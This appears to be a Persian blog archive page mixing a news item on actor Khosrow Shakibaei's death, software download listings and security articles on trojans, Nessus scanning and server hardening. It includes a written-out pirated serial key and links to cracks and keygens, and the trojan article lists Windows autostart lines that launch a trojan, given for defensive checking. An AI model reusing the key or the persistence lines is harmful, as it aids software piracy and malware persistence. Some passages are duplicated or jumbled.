خلیج تا ابد پارس میماند

 

       

ادامه مطلب

بقیه عکسها در ادامه مطلب

ادامه مطلب

واحد مرکزی خبر:این هنرمند کشورمان که مدت ها از عارضه سرطان کبد رنج می برد، ساعت 9 صبح  امروز جمعه در بیمارستان پارسیان تهران درگذشت.

پیکر مرحوم خسرو شکیبایی روز یکشنبه 30 تیر ساعت 9 صبح از مقابل تالار وحدت تهران به سمت قطعه هنرمندان بهشت زهرا تشییع  خواهد شد.

خسرو شکیبایی در  سال 1323در تهران به دنیا آمد.

وی فارغ التحصیل بازیگری دانشکده هنرهای زیبا دانشگاه تهران بود و فعالیت هنری خود را از سال 1342 با بازیگری تئاتر آغاز کرد.

وی نخستین بار در سال 1353 در فیلم کوتاه و 16 میلیمتری "کتیبه" به کارگردانی فریبرز صالح مقابل دوربین رفت.

وی در سریال هایی چون لحظه ،کوچک جنگلی ،مدرس ،روزی روزگاری ،خانه سبز ،کاکتوس ،آواز مه ،تفنگ سرپر به ایفای نقش پرداخت .

بازی در فیلمهای هامون ، کیمیا ، کاغذ بی خط از دیگر نقش آفرینی های این هنرمند بود.

خسرو شکیبایی در هشتمین و سیزدهیمن جشنواره فیلم فجر بدلیل بازی در فیلمهای هامون و کیمیا سیمرغ بلورین بهترین بازیگر را دریافت کرد.

با نهايت تاسف و تاثر در گذشت اين هنرمند فقيد را به جامعه هنري ايران ، طرفدارانش و همچنين خانواده ي داغدارش تسليت عرض نموده بقاي عمر بازماندگان را مسئلت داريم.

Guitar Pro ابزاري قدرتمند براي گيتاريست ها ميباشد كه به شما اين امكان رو ميدهد تا مهارتهاتون رو در ساخت آهنگ و ويرايش آن بهبود ببخشيد. مجهز به ظاهري آشنا براي كار ميباشد كه به آساني ميتونيد باهاش ارتباط برقرار كنيد .مجهز به ويراستار Tablature براي 4 , 5 , 6 و 7 String همچنين امكان ايجاد افكتهاي مختلف (bend, slide, vibrato, grace notes, ghost notes, harmonics ) . ميتونيد فايلهاي MIDI را به درون اين نرم افزار وارد كنيد و علاوه بر ديدن چگونگي نوشته شدن Note آنها ميتونيد تغييراتي نيز به سليقه ي خود در آن ايجاد نماييد تا براي شروع نت نويسي شما مفيد باشد. قادره در هر لحظه آهنگ را براي شما به صورت پيش نمايش نشان دهد . مجهز بودن به ابزارهاي گوناگون و همچنين به يك موتور جستجوي قوي براي پيدا كردن انواع Tablature در اينترنت و دارا بودن Transposition ,Digital Guitar Tuner FretBoard ,KeyBoard ,Scale Tool و Speed Trainer assistant و صفحه نمايش Full-Screen و MultiTrack از ويژگيهاي خوب ديگر اين نرم افزار ميباشد. خلاصه اگر دنبال نرم افزار براي كار با گيتار و نت نويسي ميگرديد Guitar Pro رو حتما امتحان كنيد.

 

Download

: Serial Number

User ID : WWW.P30TOOLS.Com

Key ID : HN0AH-AZ870-0AAAZ

این هم نسخه کامل آنتی ویروس نورتون 2007. این نسخه چند ماه قبل آمده بود ولی فعال کننده آن جدیدا آمده است. سایتهای زیادی نسخه های ناقص را بدون فعال کننده و تست قرار دادند و خیلی ها دانلود کردند ولی نتوانستند از آن استفاده کنند به ما هم گفتند که این برنامه را در بخش دانلود بگذاریم. اما سایت تبیان نسخه ...

 

Norton Antivirus 2007

Google Video Player نرم افزار مخصوص سايت http://video.google.com هست كه روزانه هزاران فيلم ، ويديو كليپ ، صحنه هاي به ياد ماندني و ... به آن اضافه مي شود. شما بدون داشتن اين نرم افزار فقط مي تونيد اين فيلم ها رو به صورت Online تماشا كنيد اما با استفاده از اين نرم افزار شما مي تونيد اين تصاوير رو روي سيستم خودتون ذخيره بكنيد و براي هميشه داشته باشيد.

Download

Mp3 Doctor نرم افزار بسيار مفيد و كم حجمي مي باشد كه به كاربر امكان مي دهد تا بتواند روي فايل هاي صوتي خود عملياتي از قبيل : تنظيم رنج صداي تمام يا تعدادي از آهنگ ها روي يك سطح مشخص ، تبديل فايل هاي صوتي به فرمت هاي مختلف ، قابليت حذف صداي خواننده با درصد بالا ، حالات هاي مختلف براي پخش آهنگ با انواع سبك هاي موسيقي ، حذف قسمت هاي بي اهميت و ... مي باشد.

 

Password : www.p30tools.com

Download

Keygen

نسخه ي جديد و اولين نسخه ي نرم افزار محبوب Windows Media Player بعد از انتشاره ويندوز ويستا هم عرضه شد. اين پلير معروف و كم نظير بدون شك از بهترين و پر استفاده ترين نرم افزار پلير هست. شركت مايكروسافت طبق روال قديم اين نرم افزار را به همراه چند فايل به روز رساني عرضه كرده كه با نصب اين پلير به صورت خودكار روي سيستم شما نصب خواهد شد . نصب اين نرم افزار به همراه نرم افزار Valid كننده ي مايكروسافت هست كه به وسيله ي اين Valid كننده اجازه ي نصب Windows Media Player داده مي شود. با اين حساب مايكروسافت اجازه ي نصب اين پلير را رويه ويندوزهاي تقلبي يا اصطلاحا كرك شده را نمي دهد

 

"Download "32 Bit Edition

"Download "64 Bit Edition

Jetaudio یکی از بهترین نرم افزارها برای پخش فایل های صوتی و تصویری هست. این نرم افزار از اکثر فرمت های صوتی و تصویری پشتیبانی می کند. از قابلیت های دیگر Jetaudio میتوان به ویرایش فایل های صوتی و تصویری , تبدیل فرمت ها یا Convert کردن , تنظیمات سبک و نوع موسیقی و... اشاره کرد.

 

Download 

Nullsoft Winamp  نرم افزار سریع، راحت و کاربر پسند پخش صوت در ویندوز میباشد. که علاوه بر پخش mp3 توانایی پخش فایلهای صوتی (OGG, AAC, WAV,MOD, XM, S3M, IT, MIDI, etc)  فایلهای تصویری (AVI, ASF, MPEG, NSV) را نیز دارا میباشد. از قابلیت های Winamp سری پنج میتوان به سازگاری با Winamp 2 Plug-ins ، پشتیبانی از پوسته های Winamp 1.x/2.x و پوسته های Winamp 3، رقص نور های جذاب، کتابخانه فایلهای صوتی، پشتیبانی از رادیو و تلویزیون اینترنتی، تبدیل سی دی های صوتی به mp3 و رایت سی دی اشاره کرد.
نسخه Full تمامی ویژگی های بالا را دارا میباشد. ولی نسخه Lite دارای امکانات کمتری است و قابلیت های چون کتابخانه فایلهای صوتی، رایو و تلویزیون اینترنتی و رایت سی دی را ندارد!

 

Download Full - Size : 8 Mb

Download Pro - Size : 8 Mb

 Download Lite - Size : 2.6 Mb

شتاب لش دیکشنری 2 یک دیکشنری ساده و سریع انگلیسی به فارسی است که خصوصیت اصلی آن راحتی استفاده از آن می باشد. بعد از اجرای این دیکشنری شما می توانید از آن در تمام برنامه های ویندوز استفاده کنید و به سرعت معنی لغت مورد نظر خود را پیدا کنید.

 

   دانلود

 Babylon - بابیلون 7 نرم افزار پیشتاز فرهنگ های لغت و ترجمه. بابیلون نرم افزاری کلیه نیاز های شما در زمینه ترجمه لغت را جوابگو خواهد بود. با استفاده از بابیلون شما به سرعت میتوانید ایمیلها، صفحات وب، مستندات و کلیه لغات مورد نظر خود را ترجمه کنید. بابیلون همیشه و همه جا زیر دستان شما خواهد بود هرگاه برای ترجمه لغتی اراده کنید کافیست تنها یک کلیک کنید تا ترجمه لغت مورد نظر شما به بیش از 50 زبان مختلف دنیا به شما نشان دهد. پنجره شناور این برنامه همانند یک دستیار همیشه با شما خواهد بود همانطور که با یک کلیک روی کلمه مورد نظر نمایش داده میشود به حرکت دادن ماوس و بدون هیچ کلیکی خود به خود نیز ناپدید میشود.

قابلیت تلفظ لغات:
 اضافه کردن تلفظ با صدای مرد
 اضافه کردن تلفظ با صدای زن

لغتنامه ها:
 دیکشنری انگلیسی به فارسی برای ویندوزهای لاتین
 دیکشنری انگلیسی به فارسی برای ویندوزهای فارسی
 دیکشنری فارسی به انگلیسی
 دیکشنری پیشرفته انگلیسی به فارسی با توضیحات اضافه و کلمات مشابه
 دیکشنری انگلیسی به فارسی لغات صنعتی
 مشاهده تمام لغت نامه های تخصصی

 Download

جديدترين نسخه از نرم افزار پيغام رسان ياهو به نام Yahoo Messenger 9 Beta به تازگي از طرف شركت ياهو عرضه شده. Yahoo Messenger يكي از پر طرفدارترين نرم افزارهاي پيغام رسان هست كه بين كاربرهاي ايراني از محبوبيت خاصي بر خوردار هست. اين نسخه نيز همانند نسخه هاي قبلي Yahoo Messenger به شما امكان ارتباط با نسخه ي جديد نرم افزار پيغام رسان مايكروسافت (Windows Live Messenger) را ميدهد. لازم به ذكر مي باشد كه شركت ياهو در اين نسخه تغييرات زيادي در شكل و پوسته ي نرم افزار خود داده است.

Download

Xara 3D
برنامه قدرتمند برای خلق انواع تصاویر سه بعدی، توسط این برنامه میتوانید برای سایت خود لوگو یا آرم سه بعدی جذابی ایجاد کنید، این برنامه جالب به همین فونت های دو بعدی ویندوز جان میبخشد و آن ها را به صورت سه بعدی در میاورد، تمامی جزئیات از قبیل عمق، میزان نور، جهت تابش نور، نرمی، جنس، سایه ها همه و همه قابل تنظیم هستند.
همچنین میتوانید با حرکت بخشیدن با آنچه خلق کردید انیمیشن های سه بعدی ایجاد کنید و حتی به عنوان اسکرین سیور نیز از آنها استفاده کنید، تصاویر تولید شده توسط این برنامه کیفیت بالای دارند و به فورمت های WMF/EMF قابل ذخیره میباشند. که میتوان آنها را در برنامه CorelXARA ویرایش کرد و برای انتشار از طریق وب و فورمت های رایج در اینترنت آماده نمود.

 

دانلود 10 دقه

کرک

 

 

 

 

 

وقتی رفتی

غربت من

نفرین (New Version)

کدوم شانس

هنوز

خیلی تنهام

وقتی نیستی

 

 

 

یه کلیپ از فوتبال خیابونی اونم با عابرای پیاده... ببینین چطوری عابرارو دیریبل می کنن !!!

 

دانلود

این هم کلیپ در زدن به شیوه ای خاص خیلی جالبه دانلود کنید

دانلود

 

این هم کلیپی از دستی کشیدن مزدا به 500 متری فکر کنم میره

 

 

دانلود

این هم کلیپی از کشیدن دندان یک پسر بچه با انبر دستی بد بخت بیجاره

دانلود

 

محافظ صفحه های غیر استاندارد یکی از عوامل
بسیار مهم بالا رفتن مصرف باطری گوشی است. اما نرم افزار مخصوص اسکرین
سیور برای گوشی های سونی اریکسون سری UIQ با ساخت اسکرین سیور های مخصوص
بر توان باطری اثر نمی گذارد.
قابلیت نصب بر روی گوشی های :
P800 , P900 , P910 , P990 , P1i , M600 , W950 , W960

دانلود با حجم ??? کیلوبایت

پسورد فایل : www.kamyabonline.com

به نقل از آی آر تی سی

 ۴۴ ثانیه

فرمت : 3gp

دانلود - با حجم ۴۳۵ کیلوبایت

رمز نگاری : حملات متداول و راه حل های ممکن


مقدمه
ان از اینکه فقط کاربران مجاز،به اطلاعات حساس شرکت و یا ایمیل های شخصی خودشان دسترسی دارند میتوان کار چندان سادهای نباشد با توجه به این حقیقت که به طور متوسط هر کاربر باید حداقل 4الی 5 رمز را بخاطر بیاورد که برخی از این رمزها باید به طور ماهیانه نیز عوض شوند اکثریت کاربران به هنگام انتخاب و یا به خاطر آوردن یک رمز دچار ناامیدی میشوند و کاملا از عواقب کارهایشان به هنگام کنترل داده های حسابشان، ناگاه هستند.
این مقاله بر این ضرورت دارد که چقدر رمزهای امنیتی با وجود شکستنی بودنشان مهم و ضروری هستند همچنین روشهای مختلفی برای ایجاد و پشتیبانی از رمز ها بیان خواهد شد و متدهای جایگزینی ممکن برای این رمزها که به سه دسته Passphrases،Biomectrics وPKI(Public Key Infrastructure) تقسیم میشوند بررسی خواهد شد.
خطرات تحمیلی رمزها:

با وجود اینکه هنوز اکثریت سازمانها و تقریبا 99% کاربران خانگی ،به رمز ها به عنوان اصلی ترین شیوه کنترل منابع شخصی و حساس،وابسته هستند،اما ایجاد،پشتیبانی ناامن و انتقالات در طول شبکه میتواند درهای اطلاعات شخصی و یا سازمانی هر گروه یا دسته ای را بروی هکرها باز کند.
مدیرانی که هوز از الگوی قدیمی پیروی میکنند،فکر میکنند که ضروری ترین و ساده ترین روش برای شناسایی یک کاربر در یا پایگاه داده شان ،استفاده از رمز (Password)است اما حقیقت این است که کاربران با درک این نکته که لازم است ...

 

به علت طولانی بودن در ادامه مطلب

ادامه مطلب

راه اندازي سرور وب تحت ويندوز و فراهم نمودن شرايط امنيتي لازم در مقابل نفوذگران

در اين مقاله سعي خواهم داشت در مورد راه اندازي يك وب سرور تحت ويندوز 2000 با IIS 5.0 را شرح دهم و هم چنين نكات لازم را جهت برقراري امنيت لازم در مقابل حفره هاي امنيتي شناخته شده و مهم را ارائه كنم ( من فرض را بر اين مي گيرم كه شما از قبل سرور IIS را بر روي سيستم نصب نموده ايد )


- شناخت ابزار هاي مديريتي

همان طور كه در شكل زير مشاهده مي كنيد ابزار هاي مديريتي ويندوز 2000 داراي قسمت هاي مختلفي ايست كه سعي مي كنم در مورد هر قسمت در اين بخش توضيحاتي مختصري ارائه كنم ...



تصوير 1 - ابزاري هاي مديريتي


Component Services

اين قسمت شامل مديريت و تنظيم نمودن برنامه هاي ...

 

به علت طولانی بودن در ادامه مطلب

ادامه مطلب

مقدمه

در اين درس با RFC ها كه مراجعي تخصصي براي بدست آوردن اطلاعات جامع در زمينه شبكه هستند آشنا خواهيد شد



RFC چيست :

RFC سر نام عبارت Request For Comment و به معني درخواست براي توضيح مي باشد
RFC ها مراجعي بزرگ درباره مسائل مربوط به شبكه هستند كه هر كدام از آناه درباره موضوعي خاص نوشته شده و شماره مربوط به خود را دارند . به عنوان مثال RFC 768 پروتكل UDP را مورد برسي قرار مي دهد .
اين مراجع به صورت فايلهاي متني هستند كه بيشتر در قالب موضوعات تخصصي همچون تشريح پروتكل هاي مختلف و اينترنت منتشر مي شوند.

دسترسي به RFC ها :
RFC ها در برخي از سايت ها كه در زمينه ارائه آنها فعاليت مي كنند يافت مي شود . اين وب سايت ها مانند كتابخانه هايي هستند كه RFC ها را در خود جاي داده اند و براي دسترسي به RFC مورد نظر خود در آنها ، تنها نياز به شماره آن RFC داريم

ietf يكي از بهترين وب سايتها ست كه در اين زمينه فعاليت مي كند. شما مي توانيد با مراجعه به صفحه زير از سايت ietf و وارد كردن شماره RFC در باكس مورد نظر به راحتي به آن دسترسي پيدا كنيد

http://www.ietf.org/rfc.html

http://www.rfc-editor.org/rfcxx00.html


آيا تنها سازمانهاي استاندارد مي توانند RFC ها را تنظيم و ارائه كنند؟
تهيه و تنظيم RFC‌ها تنها به عهده ي سازمانهاي استاندارد مانند Internet Engineering Task Force نيست بلكه افراد عادي نيز مي توانند RFC هايي تهيه كرده و آنها را براي IETF بفرستند تا پس از برسي به RFC هاي ديگر اضافه شود


ليست RFC ها :

از آنجايي كه پيدا كردن يك RFC درباره موضوعي خاص كار مشكلي است ، ليستي از RFC هاي كاربردي و همه در آدرس زير براي شما فراهم شده است .




نكات مهم درس :
1- RFC‌ ها در زمينه ء فني نقش مهمي براي هر فرد كه بخواهد در ك عميقتري از TCP/IP داشته باشد محسوب مي شود.
2- RFC ها مراجعي بزرگ هستند كه تنها در صورت نياز به اطلاعات تخصصي به آنها مراجعه مي شود

مقدمه

با گسترش فرهنگ استفاده از كامپيوتر و راهيابي آن به ادارات، منازل، اين ابزار از حالت آكادميك و تحقيقاتي بدر آمد و مبدل به پاره اي از نيازهاي معمول زندگي شد. يكي از دستاوردهاي اين پيشرفت، ظهور شبكه اينترنت است كه به سرعت در كشورها توسعه يافته و به يك پديده اجتماعي مبدل گشته است.

اجتماع بزرگ كاربران اينترنت در سرتاسر دنيا از هر منطقه و نژادي كه باشند شامل افراد خوب و بد خواهند بود، عده اي در جهت كسب منافع براي خود و ديگران تلاش مي كنند و عده اي در جهت جذب منابع ديگران براي خود. با توجه به نو پا بودن اينترنت نمي توان انتظار داشت كه يك فرهنگ صحيح و غني بر آن حاكم شده باشد و لذا احتمال سرقت اطلاعات و يا دستكاري و انهدام آنها بنا به انگيزه هاي ناسالم، اهداف سياسي، جذب نامشروع ثروت مي رود.

اين مجموعه که قرار است بطور منظم در نشريه تخصصی IC منتشر گردد درباره چگونگي كار تروجان ها، انواع آنها و چگونگي تشخيص و مقابله با آنها به نكات مفيدي اشاره خواهد نمود. ضمناً در قسمت پاياني هر قسمت نيزآدرسهاي منابع تحقيق بصورت مستقيم در اختيار خواننده محترم قرار خواهد گرفت. همچنين علاقه مندان مي توانند براي دريافت اطلاعات بيشتر به سايت هاي معرفي شده مراجعه نموده و نرم افزارهاي مربوط را دريافت نمايند. ذکر اين نکته لازم است که به دليل گستردگي استفاده از سيستم عامل ويندوز در ايران، مطالب ارائه شده درباره تروجانهای تحت ويندوز می باشد.
يك Trojan Horse چيست؟

مي توان تعاريف زير را مطرح كرد:

يك برنامه ظاهراً بدون نويسنده يا به عبارتي با يك نويسنده غير مشخص که اعمال ناشناخته و حتي ناخواسته از طرف كاربر انجام دهد.

يك برنامه قانونی و معروف كه داخلش دگرگون شده است، بطوری که کدهای ناشناخته ای به آن اضافه گرديده و اعمال شناخته نشده اي بطور ناخواسته از طرف كاربر انجام مي دهند.

هر برنامه اي كه ظاهر مطلوب پسنديده اي به همراه برخي از اعمال مورد نياز داشته باشد بطوريكه كدهاي محقق شده اي كه از نظر كاربر مخفي است درون آن موجود مي باشد. يك سري اعمال نا شناخته و غير منتظره اي كه بطور حتم با نظر كاربر نبوده است را انجام مي دهد.

اسب تراوا نامي است كه از يك افسانه قديمي گرفته شده كه درباره چگونگي نفوذ يونانيان بر محل دشمنان خود از طريق ساختن يك اسب بزرگ و هديه دادن آن به دشمن كه نيروهايشان در داخل مجسمه اسب قرارگرفته بودند. هنگام شب سربازان يوناني اسب را شكستند و به دشمنانشان حمله نمودند و بطور كامل آنها غافلگير كردند و در جنگ فاتح ميدان شدند.


تروجان ها چگونه كار مي كنند؟

تروجان ها به دو قسمت تقسيم مي شوند. يك قسمت Client (خدمات گيرنده) و ديگری Server (خدمات دهنده). وقتي قرباني ندانسته قسمت Server را روي سيستم خودش اجرا مي كند. حمله كننده بوسيله قسمت Client با Server كه روي كامپيوتر قرباني است متصل مي شود و از آن پس مي تواند كنترل سيستم قرباني را در دست بگيرد . پروتكل TCP/IP كه استاندارد معمول براي برقراري ارتباطات است به اين تروجان آلوده ميشود و تروجان از طريق آن كارش را انجام مي دهد. البته لازم به ذكر است كه برخي اعمال تروجانها نيز از پروتكل UDP استفاده مي كنند. معمولاً زماني كه Server روي كامپيوتر قرباني اجرا مي شود. خود را در جايي از حافظه مخفي مي كند تا پيدا كردن يا تشخيص آن مشكل شود و به برخي درگاههاي خاص (Port) گوش مي دهد تا ببيند درخواست ارتباطي به سيستم از طرف حمله كننده آمده است يا نه، از طرفي رجيستري را نيز به گونه اي ويرايش مي كند كه برخي از اعمال بطور خودكار روي سيستم شروع به كار كنند.

براي نفوذ كننده لازم است كه IP قرباني را بداند براي اينكه بتواند به سيستم او متصل شود. اكثر قريب به اتفاق تروجانها بصورتي برنامه ريزي شده اند كه IP قرباني را براي حمله كننده ارسال مي كنند همانند سيستم پيغام گذار از طريق ICQ يا IRS . اين زماني اتفاق مي افتد كه قرباني IP ديناميك داشته باشد بدين معني كه هر زمان به اينترنت متصل ميشود و يك IP متفاوت از قبل داشته باشد كه اغلب سيستم هايي كه به روش dial- up به اينترنت متصل مي شوند از اين قانون پيروي مي كنند. كاربران ASDL معمولا IP هاي ثابت دارند به همين علت IP آلوده شده همواره براي حمله كننده شناخته شده است و اين حالت باعث تسهيل درامر اتصال به سيستم قرباني مي گردد.

اغلب تروجانها از روش شروع اتوماتيك استفاده مي كنند. بصورتي كه اگر شما كامپيوترتان را خاموش كنيد آنها قادر خواهند كه فعاليتهايشان را مجددا ً آغاز كنند و دسترسي لازم به حمله كننده را روي سيستم شما بدهند و ساختن تروجانها با قابليت شروع روشهايي هستند كه هميشه مورد استفاده قرار مي گيرند. يكي از اين روشها، محلق كردن تروجان به يك فايل اجرايي كه كاربرد زيادي دارد مي باشد، به عبارت ديگر محلق نمودن تروجان به يك برنامه پركاربرد ، موجب عملي شدن تفكرات حمله كننده خواهد شد. روشهاي شناخته شده نيز همانند دستكاري فايلهاي ريجستري ويندوز مي تواند به عملي شدن افكار حمله كننده بيانجامد. فايلهاي سيستمي ويندوز قرار دارند كه مي توانند بهترين انتخابهاي حمله كنندگان باشند.


به جهت اينکه دوستان بتوانند سيستم خود را در برابر اين حمله ها محافظت نمايند، قسمتهای مختلف ويندوز که می توان از آن استفاده نمود را در اينجا بررسی می کنيم.

پوشه شروع خودكار

پوشه اي كه بصورت خودكار در شروع كار ويندوز فراخواني مي شود و فايلهاي داخل آن بصورت اتوماتيك اجرا مي شوند در آدرس زير قرار دارند.


C:\ windows\ start Menu \ programs \startup



البته فرض براي اين است كه سيستم عامل ويندوز در درايو C و در شاخه windows نصب شده باشد.


فايل Win.ini

فرمت شروع خودكار در اين فايل بصورت زير مي باشد :


Load = Trojan.exe

Run = Trojan.exe




فايل System.ini

فرمت بكارگيري تروجان در اين فايل سيستمي بصورت زير است:


Shell = explorer.exe Trojan.exe



كه باعث مي شود بعد از هر بار اجراي Explorer فايل Trojan.exe اجرا شود.


فايل Wininit.ini

اين فايل توسط Setup.exe برنامه هاي نصب شوند مورد استفاده قرار مي گيرد.

بدين صورت كه يك بار اجرا شود، قابليت حذف خودكار را نيز دارد كه براي تروجان ها بسيار سهل مي باشد.


Winstart.bat

اين فايل دسته اي هم در ابتداي شروع به كار ويندوز فراخواني شده و فرامين داخل آن به ترتيب اجراي مي شوند كه تروجان مي تواند با افزودن خط زير خود را در حافظه بار كند.


@ Trojan.exe




فايل Autoexec.bat

اين فايل دسته اي هم از فايلهاي معروف فراخواني شده در ابتداي كار سيستم عامل مي باشد كه مي توان با دستكاري و اضافه نمودن خط زير بر آن تروجان مورد نظر را در سيستم قرباني اجرا نمود:


C:\ Trojan.exe




فايل Config.sys

اين فايل نيز از معروفترين فايلهاي پيكر بندي سيستم است و مي تواند در امر اجراي تروجان كاربرد داشته باشد.

براي هك كردن سايت بايد نقاط آسيب پذيري يا نقاط ضعف سيستم را تعيين كرد

برخي از ابزار هاي پويش و جستجو نقاط آسيب پذيري كه عبارتند از


Network associates Cybercop Scanner

http://www.pgp.com/products/Cybercop-scanner/default.asp

ISS ‘s internet Scanner http://iss.net/

Eeye ‘s Retian Scanner http://eeye.com/

Nessus, by Nessus project team http://Nessus.org/

و ...

Xx_parsa_xx

از بين تمام اين ابزارها Nessus ويژگي هاي زيادي دارد

1- كد برنامه نويسي آن در اختيار عموم است open

2- مي توان كدهاي لازم براي يك نقطه ضعف جديد را تعريف كنيم

3- اين ابزار رايگان است

4- تمام قابليت هاي nmap در Nessus وجود دارد

5- Nessus در linux و انواع ويندوز قابل نصب است

Nessus بيش از 500 نوع plug-in دارد

امكانات بعضي از plug-in ها

1- Finger abuses

اين plug-in بر روي اشكالات موجود در سرويس دهنده finger كه بطور معمول روي سيستم عامل unix قرار دارد تمركز مي كند

2- Windows

اين plug-in بر روي حملات به انواع سيستم عامل هاي مبتني بر ويندوز متمركز مي باشد

3- Ftp

اين plug-in نقاط آسيب پذيري سرويس دهنده هاي ftp را بررسي مي كند


4- backdoor

اين plug-in ويروسهاي تروا را بر روي ماشين هدف جستجو مي كند

5- Firewall

اين plug-in خطاهاي ديواره آتش را جستجو مي كند

6- gain root Remotrly

اين plug-in در جستجوي نقطه آسيب پذيري سيستم ها است كه آيا مي توان در سطح super-user به يك سيستم وارد شد

و بسياري از plug-in هاي ديگر به صورت مجاني

Nessus داري د و بخش است

1- Client 2- server

يكي از بهترين امكانات Nessus نوشتن plug-in توسط برنامه نويس و اضافه كردن آن است

كد هايي لازم را در C نوشته و به آ اضافه مي كنيم اين plug-in هاي نوشته

شده توسط يك API تعريف مي شود و در Nessus ينام NAPI

Application programming Interface) Nessus ( با پايگاه داده ها

و يا بقيه plug-ins ها ارتباط دارد
اين نرم افزار امكانات خيلي زياد ديگري دارد ...

براي هك كردن سايت بايد نقاط آسيب پذيري يا نقاط ضعف سيستم را تعيين كرد

برخي از ابزار هاي پويش و جستجو نقاط آسيب پذيري كه عبارتند از


Network associates Cybercop Scanner

http://www.pgp.com/products/Cybercop-scanner/default.asp

ISS ‘s internet Scanner http://iss.net/

Eeye ‘s Retian Scanner http://eeye.com/

Nessus, by Nessus project team http://Nessus.org/

و ...

Xx_parsa_xx

از بين تمام اين ابزارها Nessus ويژگي هاي زيادي دارد

1- كد برنامه نويسي آن در اختيار عموم است open

2- مي توان كدهاي لازم براي يك نقطه ضعف جديد را تعريف كنيم

3- اين ابزار رايگان است

4- تمام قابليت هاي nmap در Nessus وجود دارد

5- Nessus در linux و انواع ويندوز قابل نصب است

Nessus بيش از 500 نوع plug-in دارد

امكانات بعضي از plug-in ها

1- Finger abuses

اين plug-in بر روي اشكالات موجود در سرويس دهنده finger كه بطور معمول روي سيستم عامل unix قرار دارد تمركز مي كند

2- Windows

اين plug-in بر روي حملات به انواع سيستم عامل هاي مبتني بر ويندوز متمركز مي باشد

3- Ftp

اين plug-in نقاط آسيب پذيري سرويس دهنده هاي ftp را بررسي مي كند


4- backdoor

اين plug-in ويروسهاي تروا را بر روي ماشين هدف جستجو مي كند

5- Firewall

اين plug-in خطاهاي ديواره آتش را جستجو مي كند

6- gain root Remotrly

اين plug-in در جستجوي نقطه آسيب پذيري سيستم ها است كه آيا مي توان در سطح super-user به يك سيستم وارد شد

و بسياري از plug-in هاي ديگر به صورت مجاني

Nessus داري د و بخش است

1- Client 2- server

يكي از بهترين امكانات Nessus نوشتن plug-in توسط برنامه نويس و اضافه كردن آن است

كد هايي لازم را در C نوشته و به آ اضافه مي كنيم اين plug-in هاي نوشته

شده توسط يك API تعريف مي شود و در Nessus ينام NAPI

Application programming Interface) Nessus ( با پايگاه داده ها

و يا بقيه plug-ins ها ارتباط دارد
اين نرم افزار امكانات خيلي زياد ديگري دارد ...

در اين مقاله سعي خواهم داشت نكاتي را كه مديريان شبكه مي توانند در جهت بالا بردن امنيت سرورهاي خود مورد توجه قرار دهند را بيان كنم .


حذف برخي از Script Mapping ها

سرور اي-اي-اس از قبل جهت پشتيباني فايل هاي نظير ASP يا SHTML تنظيم شده است . هنگامي كه سرور درخواستي را مبتني بر اين فايل ها دريافت مي كند اين درخواست توسط يك DLL مورد انجام قرار مي گيرد كه در بسياري از موارد داراي حفره هاي امنيتي مي باشند كه دسترسي به سيستم را ميسر مي كند .

. Internet Services Manager را باز كنيد

2 . Properties را انتخاب كنيد

3 . WWW Service را انتخاب نموده و Edit را كليك كنيد

4 . در Configuration , HomeDirectory را انتخاب نماييد

اين اسكريپت مپينگ ها را ...

به علت طولانی بودن در ادامه مطلب

ادامه مطلب

امنيت برتر در سرورهاي Apache
اين مقاله به صورت قدم به قدم به شما نحوه نصب و تنظيم نمودن وب سرورهاي آپاچي نسخه 1.3.x جهت امنيت بالاتر را نشان مي دهد كه سعي شده جزئيات كار به خوبي مورد بررسي قرار بگيرد .

قبل از اينكه ما مرحله امنيت وب سرور آپاچي را مورد بررسي قرار دهيم بايد اين را مشخص نماييم كه چه استفاده اي از سرور را خواهيم نمود . متنوع بودن استفاده از وب سرورهاي آپاچي نوشتن يك روند جهاني جهت امنيت اين سرور را بسيار مشكل مي سازد . به همين دليل است كه در اين مقاله ما چنين وب سروري با چنين شرايطي را در نظر مي گيريم :

اين وب سرور از طريق اينترنت قابل دسترسي است

فقط صفحات اچ-تي-ام-ال ثابت در آن قرار مي گيرد

اين سرور مكانيزم هاستينگ مجازي را پشتيباني خواهد نمود

صفحات مهم وب سايت فقط از طريق يك آدرس IP مخصوص و يا كاربران خاص مورد استفاده قرار مي گيرد ( basic authentication )

اين سرور همه درخواست هاي دريافتي را ضبط مي كند ( شامل اطلاعاتي در مورد مرورگرهاي وب نيز خواهد شد )

از اين جهت قابل تاكيد است كه كه مدل ذكر شده در بالا PHP, JSP, CGI و ديگر تكنولوژي هايي كه امكان تداخل با سرويس هاي وب سرور را دارد را پشتيباني نمي كند . استفاده از تكنولوژي هايي كه در بالا ذكر شد با اين كه در دنياي امروز مورد احتياج هسنتد ممكن است يك ريسك امنيتي بزرگ در امنيت باشد كه قابل ذكر است يك اسكريپت كوچك مي تواند امنيت سرور را به كلي كاهش دهد . ولي چرا ؟ بايد بگم اسكريپت هاي كاربردي ASP/CGI ممكن است داراي حفره هاي امنيتي ...

به علت طولانی بودن در ادامه مطلب

ادامه مطلب

اگر تا به حال از ويندوز سرورNTيندوز سرور 2000استفاده كرده با شيد ، احتمالا متوجه شده ايد كه مايكرو سافت آنها را به صورت پيش فرض، غير ايمن طراحي كرده است . گرچه مايكروسافت و ساز و كارهاي امنيتي متعددي ايجاد كرده است ، اما نصب آنها به عهده كاربران است . اين در حالي است كه وقتي مايكرو سافت ويندوز 2003 را انتشارداد ، با اين كار ، فلسفه جديد اين است كه بايد به صورت پيش فرض ايمن باشد. به باشيد كلي اين ايده بسيار خوبي است ، اما مايكروسافت نتوانيد آن را به طور كامل پياده كند . با آن كه سرور بايد به طور كامل پياده كند . با آن كه ويندوز 2003 را انتشار داد ، با اين كار ، فلسفه خود را تغيير داد .

فلسفه جديد اين است كه سرور با يد به صورت پيش فرض ايمن باشد. به طور كلي اين ايده بسيار خوبي است ، اما مايكروسافت نتوانست آن را به طور كامل پياده كند . با آن كه ويندوز 2003 بدون شك ايمن تر از ويندوز NTيا ويندوز2000است ، اما هنوز هم نقصاني در آن ديده مي شود . در اينجا ما اعمال ساده اي را كه شما مي توانيد براي ايمن تر كردن ويندوز سرور 2003 انجام دهيد شرح مي دهيم .

نقش خود را بدانيد
شناخت نقش سروردر روند ايمن سازي بسيار حياتي است. نقش هاي متعددي وجود دارد كه ويندوز سرور ممكن است بر عهده داشته با شد .
